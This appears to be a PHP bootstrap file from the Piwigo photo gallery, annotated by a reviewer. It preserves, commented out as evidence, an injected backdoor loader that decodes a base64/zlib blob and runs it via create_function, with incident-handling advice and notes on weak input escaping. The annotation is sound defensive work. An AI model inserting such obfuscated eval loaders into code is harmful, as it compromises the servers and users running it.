Created
December 16, 2016 14:31
<?php | |
// +-----------------------------------------------------------------------+ | |
// | Piwigo - a PHP based photo gallery | | |
// +-----------------------------------------------------------------------+ | |
// | Copyright(C) 2008-2016 Piwigo Team http://piwigo.org | | |
// | Copyright(C) 2003-2008 PhpWebGallery Team http://phpwebgallery.net | | |
// | Copyright(C) 2002-2003 Pierrick LE GALL http://le-gall.net/pierrick | | |
// +-----------------------------------------------------------------------+ | |
// | This program is free software; you can redistribute it and/or modify | | |
// | it under the terms of the GNU General Public License as published by | | |
// | the Free Software Foundation | | |
// | | | |
// | This program is distributed in the hope that it will be useful, but | | |
// | WITHOUT ANY WARRANTY; without even the implied warranty of | | |
// | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU | | |
// | General Public License for more details. | | |
// | | | |
// | You should have received a copy of the GNU General Public License | | |
// | along with this program; if not, write to the Free Software | | |
// | Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, | | |
// | USA. | | |
// +-----------------------------------------------------------------------+ | |
// Refuse to continue when PHPWG_ROOT_PATH has not been defined before this
// file is reached (i.e. the file was not pulled in by an entry script).
if (!defined('PHPWG_ROOT_PATH')) {
  trigger_error('Hacking attempt!', E_USER_ERROR);
}

// Timestamp taken at the very start, used later to report how long the page
// took to generate.
$t2 = microtime(true);
// @set_magic_quotes_runtime(0); // Disable magic_quotes_runtime | |
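//
// Emulate magic_quotes_gpc when PHP does not provide it: every GET, POST and
// COOKIE value is passed through addslashes() before the application sees it.
//
// NOTE(review): this is blanket input escaping, not a substitute for escaping
// or parameter binding at the point where a query is built. addslashes() is
// not aware of the connection character set, array keys are left untouched
// (only values are rewritten), and values that end up unquoted in SQL get no
// protection from it.
//
// get_magic_quotes_gpc() is deprecated since PHP 7.4 and removed in PHP 8.0.
// The function_exists() guard keeps this block from raising a fatal error
// there; when the function is absent magic quotes cannot be enabled, so the
// values are escaped here.
//
if (!function_exists('get_magic_quotes_gpc') or !@get_magic_quotes_gpc()) {
  /**
   * array_walk_recursive() callback: escape one request value in place.
   *
   * @param mixed $v leaf value, rewritten by reference with addslashes()
   * @param mixed $k key of the value (unused, required by the callback shape)
   */
  function sanitize_mysql_kv(&$v, $k)
  {
    $v = addslashes($v);
  }

  if (is_array($_GET)) {
    array_walk_recursive($_GET, 'sanitize_mysql_kv');
  }
  if (is_array($_POST)) {
    array_walk_recursive($_POST, 'sanitize_mysql_kv');
  }
  if (is_array($_COOKIE)) {
    array_walk_recursive($_COOKIE, 'sanitize_mysql_kv');
  }
}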
// PATH_INFO comes from the request as well, so it gets the same addslashes()
// treatment as the GET/POST/COOKIE values. Skipped when unset or empty.
if (isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"]) {
  $_SERVER["PATH_INFO"] = addslashes($_SERVER["PATH_INFO"]);
}
//
// Start every core global from a known empty value. Assigning them here, before
// anything else runs, means a value for these names cannot be carried in from
// the request (the original comment cites rewriting of language and other
// array values via URI parameters).
//
$conf = $user = $lang = $header_msgs = $header_notes = $filter = array();

// $page additionally carries the three message buckets filled during the request.
$page = array('infos' => array(), 'errors' => array(), 'warnings' => array());
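// SECURITY(review): injected loader, disabled here and kept only as evidence.
// The statement preserved below sat between two identical marker comments
// (09d2ea9c8372688b931efcff0fe725be) and does not appear to belong to the
// gallery bootstrap: it base64-decodes and zlib-uncompresses an embedded blob
// and passes the result to create_function(), which compiles its string
// argument as PHP code (eval-based; deprecated in PHP 7.2, removed in 8.0).
// The return value is discarded, so nothing else in this file refers to it;
// do not read that as "inert" when triaging. The blob itself is elided in this
// listing, so what it does cannot be determined from here.
//
// Handling: treat the installation as compromised instead of just deleting one
// line. Restore the application files from a verified release archive, search
// the tree for the same marker string and for create_function/eval combined
// with base64_decode/gzuncompress, rotate the database credentials (and the
// secret key stored in the database), and review web-server and file-change
// logs to establish how this file was modified.
//
// //09d2ea9c8372688b931efcff0fe725be
// create_function('', gzuncompress(base64_decode("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")));
// //09d2ea9c8372688b931efcff0fe725be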
// Load a compatibility shim for each listed function that this PHP build lacks.
// The file name is built from the hard-coded list below, not from request data.
foreach (array('gzopen') as $func) {
  if (function_exists($func)) {
    continue;
  }
  include_once(PHPWG_ROOT_PATH . 'include/php_compat/'.$func.'.php');
}
// Shipped defaults first, then the local overrides. The @ on the local files
// silences the warning raised when one of them does not exist.
include(PHPWG_ROOT_PATH . 'include/config_default.inc.php');
@include(PHPWG_ROOT_PATH. 'local/config/config.inc.php');

// PWG_LOCAL_DIR may already have been defined by the files above; otherwise
// fall back to 'local/'.
if (!defined('PWG_LOCAL_DIR')) {
  define('PWG_LOCAL_DIR', 'local/');
}
@include(PHPWG_ROOT_PATH.PWG_LOCAL_DIR .'config/database.inc.php');

// PHPWG_INSTALLED is not defined: hand over to the installer and stop here.
if (defined('PHPWG_INSTALLED') === false) {
  header('Location: install.php');
  exit;
}
// Database abstraction layer, selected by name through $conf['dblayer']
// (presumably set by the configuration files included earlier - verify).
include(PHPWG_ROOT_PATH .'include/dblayer/functions_'.$conf['dblayer'].'.inc.php');

// Optional PHP error display, driven by configuration.
// NOTE(review): display_errors sends messages (file paths, query fragments) to
// the visitor; this setting is meant for debugging, not for a public site.
if (!empty($conf['show_php_errors'])) {
  @ini_set('error_reporting', $conf['show_php_errors']);
  @ini_set('display_errors', true);
}

// Core libraries.
include(PHPWG_ROOT_PATH . 'include/constants.php');
include(PHPWG_ROOT_PATH . 'include/functions.inc.php');
include(PHPWG_ROOT_PATH . 'include/template.class.php');
include(PHPWG_ROOT_PATH . 'include/cache.class.php');
include(PHPWG_ROOT_PATH . 'include/Logger.class.php');

$persistent_cache = new PersistentFileCache();
// Open the database connection with the configured credentials. A connection
// failure is reported through my_error() with the exception message run
// through l10n(); the second argument (true) is passed as in the original -
// its meaning is defined by my_error(), not visible here.
try {
  pwg_db_connect(
    $conf['db_host'],
    $conf['db_user'],
    $conf['db_password'],
    $conf['db_base']
  );
} catch (Exception $e) {
  my_error(l10n($e->getMessage()), true);
}

// Charset check on the connection, then load the configuration stored in the
// database.
pwg_db_check_charset();
load_conf_from_db();
// Application logger, one file per day.
//
// The file name is hashed to make direct access by URL harder. The hash is
// salted with db_password rather than secret_key because the log must remain
// usable from i.php, and secret_key lives in the database.
//
// NOTE(review): an unguessable name is obscurity, not access control - the log
// directory should also be denied at the web-server level. The name is
// sha1(date . db_password) with a known date, so a leaked file name is material
// for offline guessing of the database password.
$logger = new Logger(
  array(
    'directory' => PHPWG_ROOT_PATH . $conf['data_location'] . $conf['log_dir'],
    'severity' => $conf['log_level'],
    'filename' => 'log_' . date('Y-m-d') . '_' . sha1(date('Y-m-d') . $conf['db_password']) . '.txt',
    'globPattern' => 'log_*.txt',
    'archiveDays' => $conf['log_archive_days'],
  )
);
// With the upgrade-feed check disabled, compare the recorded database version
// with the branch of the running code and send the visitor to upgrade.php when
// it is missing or different.
if (
  !$conf['check_upgrade_feed']
  && (
    !isset($conf['piwigo_db_version'])
    || $conf['piwigo_db_version'] != get_branch_from_version(PHPWG_VERSION)
  )
) {
  redirect(get_root_url().'upgrade.php');
}

// Image size definitions, PHP session, then plugins - in that order.
ImageStdParams::load_from_db();
session_start();
load_plugins();
// A custom ordering pattern, which the GUI form cannot express, takes
// precedence over the regular setting when it is present.
if (isset($conf['order_by_custom'])) {
  $conf['order_by'] = $conf['order_by_custom'];
}
if (isset($conf['order_by_inside_category_custom'])) {
  $conf['order_by_inside_category'] = $conf['order_by_inside_category_custom'];
}

// User handling; the code below reads $user['language'] and $user['theme'].
include(PHPWG_ROOT_PATH.'include/user.inc.php');
// Choose the project site that matches the user's language: a two-letter
// subdomain for the listed languages, dedicated hosts for zh_CN and pt_BR, and
// the main site otherwise.
if (in_array(substr($user['language'], 0, 2), array('fr','it','de','es','pl','hu','ru','nl','tr','da'))) {
  define('PHPWG_DOMAIN', substr($user['language'], 0, 2).'.piwigo.org');
} elseif ($user['language'] == 'zh_CN') {
  define('PHPWG_DOMAIN', 'cn.piwigo.org');
} elseif ($user['language'] == 'pt_BR') {
  define('PHPWG_DOMAIN', 'br.piwigo.org');
} else {
  define('PHPWG_DOMAIN', 'piwigo.org');
}

// NOTE(review): both URLs below use a plain http:// scheme. If PEM_URL is used
// to fetch extension metadata or packages, that traffic has no transport
// integrity - confirm against the callers and prefer https where supported.
define('PHPWG_URL', 'http://'.PHPWG_DOMAIN);

// A non-empty alternative_pem_url from the configuration replaces the default.
if (isset($conf['alternative_pem_url']) && $conf['alternative_pem_url'] != '') {
  define('PEM_URL', $conf['alternative_pem_url']);
} else {
  define('PEM_URL', 'http://'.PHPWG_DOMAIN.'/ext');
}
// Language files: the common strings always, the admin strings for
// administrators or when running inside the admin area.
load_language('common.lang');
if (is_admin() || (defined('IN_ADMIN') and IN_ADMIN)) {
  load_language('admin.lang');
}
trigger_notify('loading_lang');

// Site-local language file, loaded from the local directory without fallback.
load_language(
  'lang',
  PHPWG_ROOT_PATH.PWG_LOCAL_DIR,
  array('no_fallback'=>true, 'local'=>true)
);

// The guest user's display name can only be localized here, once the language
// is loaded (and not in include/user.inc.php).
if (is_a_guest()) {
  $user['username'] = l10n('guest');
}

// An auth key that was supplied but is no longer valid is reported here for
// the same reason: the message needs the language files.
if (isset($page['auth_key_invalid']) && $page['auth_key_invalid']) {
  $page['errors'][] =
    l10n('Your authentication key is no longer valid.')
    .sprintf(' <a href="%s">%s</a>', get_root_url().'identification.php', l10n('Login'));
}
// Template instance: the admin theme inside the admin area, otherwise the
// user's theme, replaced by the configured mobile theme when mobile_theme()
// says so and the running script is not 'ws'.
if (defined('IN_ADMIN') && IN_ADMIN) {
  $template = new Template(PHPWG_ROOT_PATH.'admin/themes', $conf['admin_theme']);
} else {
  $theme = $user['theme'];
  if (script_basename() != 'ws' && mobile_theme()) {
    $theme = $conf['mobile_theme'];
  }
  $template = new Template(PHPWG_ROOT_PATH.'themes', $theme);
}

// Included for as long as the 'no_photo_yet' configuration key is not set.
if (!isset($conf['no_photo_yet'])) {
  include(PHPWG_ROOT_PATH.'include/no_photo_yet.inc.php');
}
// The guest account carried a status it must not have; user handling fell back
// to the default status, and the visitor is told to report it.
if (
  isset($user['internal_status']['guest_must_be_guest'])
  && $user['internal_status']['guest_must_be_guest'] === true
) {
  $header_msgs[] = l10n('Bad status for user "guest", using default status. Please notify the webmaster.');
}

// Maintenance lock: everyone gets the header message; anyone who is not an
// administrator and is not on the identification page receives a 503 with a
// link to the login page, and the request ends here.
if ($conf['gallery_locked']) {
  $header_msgs[] = l10n('The gallery is locked for maintenance. Please, come back later.');

  if (script_basename() != 'identification' && !is_admin()) {
    set_status_header(503, 'Service Unavailable');
    @header('Retry-After: 900');
    header('Content-Type: text/html; charset='.get_pwg_charset());
    echo '<a href="', get_absolute_root_url(false), 'identification.php">',
      l10n('The gallery is locked for maintenance. Please, come back later.'),
      '</a>';
    // Padding: IE6 does not show the error output when the body is below a
    // certain size.
    echo str_repeat( ' ', 512);
    exit();
  }
}
// Optional check for pending database upgrades; adds a header message with a
// link to upgrade_feed.php when check_upgrade_feed() reports some.
if ($conf['check_upgrade_feed']) {
  include_once(PHPWG_ROOT_PATH.'admin/include/functions_upgrade.php');
  if (check_upgrade_feed()) {
    $header_msgs[] = 'Some database upgrades are missing, '
      .'<a href="'.get_absolute_root_url(false).'upgrade_feed.php">upgrade now</a>';
  }
}

// Pass the collected header messages to the template, then reset the list.
if (count($header_msgs) > 0) {
  $template->assign('header_msgs', $header_msgs);
  $header_msgs=array();
}

// Filtering is only set up when filter pages are configured and the current
// page uses them; in every other case it is explicitly switched off.
if (empty($conf['filter_pages']) || !get_filter_page_value('used')) {
  $filter['enabled'] = false;
} else {
  include(PHPWG_ROOT_PATH.'include/filter.inc.php');
}

// Append header notes coming from the configuration.
if (isset($conf['header_notes'])) {
  $header_notes = array_merge($header_notes, $conf['header_notes']);
}
// Default event handlers.
add_event_handler('render_category_literal_description', 'render_category_literal_description');

// NOTE(review): with HTML descriptions disallowed the only handler added here
// is nl2br, which converts newlines and does not escape markup - verify that
// escaping happens elsewhere.
if (!$conf['allow_html_descriptions']) {
  add_event_handler('render_category_description', 'nl2br');
}

add_event_handler('render_comment_content', 'render_comment_content');
// Comment author names have tags stripped before rendering.
add_event_handler('render_comment_author', 'strip_tags');
add_event_handler('render_tag_url', 'str2url');
add_event_handler(
  'blockmanager_register_blocks',
  'register_default_menubar_blocks',
  EVENT_HANDLER_PRIORITY_NEUTRAL-1
);

// URL protection handlers for original files, registered only when
// original_url_protection is configured.
if (!empty($conf['original_url_protection'])) {
  add_event_handler('get_element_url', 'get_element_url_protection_handler');
  add_event_handler('get_src_image_url', 'get_src_image_url_protection_handler');
}

// Bootstrap finished: notify listeners of the 'init' event.
trigger_notify('init');
?> |